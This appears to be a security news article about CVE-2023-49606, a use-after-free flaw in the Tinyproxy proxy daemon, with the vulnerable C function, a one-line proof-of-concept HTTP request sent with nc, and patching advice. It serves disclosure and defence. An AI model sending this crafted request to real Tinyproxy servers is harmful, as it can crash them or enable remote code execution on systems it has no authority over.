A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.

The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.

This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.

Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.

Despite its benefits, this vulnerability highlights a severe risk of its deployment, especially in security-sensitive environments.

CVE-2023-49606 – HTTP Connection Headers use-after-free vulnerability

The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.

Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.

This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

Tinyproxy does exactly that in the remove_connection_headers() function:

static int remove_connection_headers (orderedmap hashofheaders)
          {
                  static const char *headers[] = {
                          "connection",
                          "proxy-connection"
                  };
                  for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
                          /* Look for the connection header.  If it's not found, return. */
                          data = orderedmap_find(hashofheaders,headers[i]);                       (1)
                          if (!data)
                                  return 0;                                                         (2)
                                                   ...       
                          ptr = data;                
                          while (ptr < data + len) {
                                  orderedmap_remove (hashofheaders, ptr);                          (3)
                                                                        ...       
                          }
                          /* Now remove the connection header it self. */
                          orderedmap_remove (hashofheaders, headers[i]);                           (4)
                               }
                               return 0;
          }

Exploit Proof of Concept

As mentioned, the PoC for the vulnerability is a very simple HTTP request. One variation is:

GET / HTTP/1.1

 Connection: Connection

 Host: 192.168.86.166:8000

Assuming there is an actual host at 192.168.86.166:8000, one can do:

 cat heap-uaf.poc | nc 127.0.0.1 8888

With the relevant tinyproxy.config being:

Port 8888

 Listen 127.0.0.1

 The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.

Following the discovery, patches and updates were swiftly released to mitigate the risk.

Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.

Mitigation and Recommendations

For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.

Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.

Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.

Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.

While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

The post Tinyproxy Flaw Let Attackers Execute Remote Code appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Go to source